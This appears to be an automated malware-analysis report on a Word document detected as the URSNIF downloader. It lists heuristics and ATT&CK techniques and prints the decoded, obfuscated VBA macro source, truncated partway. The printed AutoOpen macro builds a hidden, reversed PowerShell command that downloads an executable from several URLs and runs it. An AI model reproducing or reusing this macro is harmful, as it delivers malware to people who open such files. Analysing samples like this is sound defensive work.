MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.URSNIF-6729855-3. It contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This function is used to execute external commands, indicating the document's likely purpose is to download and execute a secondary payload. The specific command construction within the script is obfuscated, but the presence of Shell() and the ClamAV signature strongly suggest a downloader or dropper functionality.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5535 bytes |
SHA-256: b221688fd929cf62b4f2b703eaf571bec2b09dc33f29d0315a1f482cd5b8c97b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tiISCCF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "52057065" + "Q"
VBA.Shell CleanString(D) + DThRUiNwfoqBSO + EwTKlmnskQ + JkFiCRjZjl + MHAjazjW + RLNtWBmEB + mdomADcRM + PhBInhEcbUwB, 90 - 90
Hour "HbR" + "c" + "275967288" + "izL"
Hour "qzqchCT" + "230210106" + "LlXvcDlqGndD" + "3793"
Hour "hMRfphE" + "164837862" + "7005" + "w"
Hour "A" + "AP"
End Sub
Attribute VB_Name = "DoapfFdmjdBQV"
Function JkFiCRjZjl()
On _
Error _
Resume _
Next
Hour "Hb" + "U"
Hour "6963" + "159261378" + "489319301" + "RHqP"
Hour "PqmrVsujApHUIX" + "JHrUAZq" + "Bhbc" + "231920472"
Hour "ni" + "woO" + "6910" + "940"
Hour "zvkXn" + "hJfp"
vAVsTDw = "c" + "md /V^:" + "^O/C" + Chr(4 + 1 + 3 + 0 + 26) + "^s" + "e^t " + "0"
Hour "rmawUtZInPPQVY" + "5033"
lwPww = "^" + "J^7X=^" + " " + "^ ^ ^ " + "^ ^ ^ " + " " + " ^"
Hour "390398003" + "117075038"
Hour "uYYTlJ" + "1538" + "9111" + "824"
lXQAEsNtS = " " + "^ ^" + " }}^{" + "hct^ac^" + "}^;k" + "^a^" + "er^b^;N" + "Nz$"
Hour "865" + "RVR"
Hour "2272" + "204513242"
Hour "RNNSLMStF" + "faTjdGcfjNi"
Hour "tN" + "AR"
LkwdTM = "^ " + "^" + "m^e^t" + "^I" + "^-^e" + "^kovnI" + "^" + ";)NN"
Hour "NrHGXriCoVoZba" + "1436"
Hour "270745301" + "zLtlrTClSjC" + "PY" + "YSiMcYX"
Hour "323976619" + "zdZJrVF" + "ALwumjFu" + "VnqoUnPh"
Hour "395551624" + "PwztGj"
cwwjFwGBmcL = "^z$ ^," + "^ZY" + "^k^$(^" + "e^l^iF" + "^" + "d" + "^a^o"
Hour "432753973" + "3929"
Hour "229398751" + "WSiv"
Hour "v" + "qPb"
Hour "NVNacIoN" + "3688" + "tuwbNMDcsmicR" + "DjsvcpJbbOM"
cAuwcia = "ln^" + "woD" + "^" + "." + "t^Xn^$^"
Hour "XkRS" + "OmhFFZ" + "m" + "8155"
Hour "6058" + "334372556"
Hour "pdYQ" + "iJqj"
toBzmcj = "{yrt{)^" + "Ts^b" + "$^ ni" + " ^Z^" + "Y^k$" + "(^hc" + "a^ero^" + "f;^'^e^" + "x^e.^'" + "+i" + "r^O^"
Hour "2039" + "p"
Hour "hPVljf" + "hzHs"
Hour "381166827" + "OfUrS"
Hour "scU" + "FWmz" + "2594" + "vfwofiRkUPdI"
JbTTwvHsjs = "$" + "+'^\'^" + "+" + "ci^l^" + "b" + "u^"
Hour "P" + "G" + "hb" + "tCBwn"
Hour "176420213" + "jRswC"
Hour "iqOHYfj" + "db" + "125820239" + "OjNz"
Hour "259" + "JslCGiJ"
Hour "6085" + "Zq" + "CPBOUjbitaoW" + "429593035"
Hour "8412" + "2351" + "145460884" + "RIN"
TUdZQj = "p^:vne" + "^$=NN^z" + "$^;" + "^" + "'^6" + "86^" + "'^ " + "= " + "^irO" + "$^"
Hour "PYTFNCWbmmLUqG" + "372711180"
Hour "5467" + "aD"
Hour "50453008" + "zWwWitTvLvLcpu" + "jbM" + "P"
Hour "9005" + "6857" + "j" + "oRuirLvPE"
VbnRuGOJtC = ";)" + "^'@^'(t" + "i^l" + "^p^S^" + ".'^" + "pH^" + "I" + "^ge" + "t/m^oc" + "^.r"
JkFiCRjZjl = vAVsTDw + lwPww + lXQAEsNtS + LkwdTM + cwwjFwGBmcL + cAuwcia + toBzmcj + JbTTwvHsjs + TUdZQj + VbnRuGOJtC
Hour "3139" + "204602433" + "KcwE" + "243985527"
Hour "7670" + "PbrMpqpIN" + "H" + "2430"
Hour "131024552" + "j"
Hour "vvrSNWH" + "475445553"
Hour "9712" + "270931338"
End Function
Function MHAjazjW()
On _
Error _
Resume _
Next
Hour "2934" + "nWkddRawaiukiS" + "fwwI" + "GmvT"
Hour "MUIsjCB" + "KMV" + "7826" + "484824836"
Hour "npdwBfWmH" + "sSaG" + "6992" + "ZmlNIwjphMPMZr"
kcifJDTYzU = "cn" + "ur^ei" + "b" + "m^o^z//" + "^"
Hour "337893607" + "chPN"
Hour "412647174" + "48957467" + "1845" + "izd"
Hour "136933561" + "133101979" + "Yn" + "VCMjzK"
jhBAdWwdjz = ":^p^t" + "^th@^" + "t/moc^." + "^m^e^" + "t" + "^isoke/" + "/:p"
Hour "403256899" + "GNbn"
Hour "DAwllS" + "343068337"
Hour "16387065" + "NEKEwuCY"
wSCHknmmCpM = "^t^" + "th" + "^@pe9" + "ID" + "^IbN/^" + "m^oc.si" + "drap"
Hour "tKNLBQ" + "oPal" + "9450" + "qvwQA"
adbsq = "e" + "dh^" + "am/" + "/" + "^:" + "^p^t^" + "th@SC^Q" + "^F/g" + "ro.^"
Hour "rsZ" + "bpFGvfijB" + "r" + "277521976"
QfVEhjMBdWL = "s^" + "01r^u^" + "hsame" + "s//^:
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.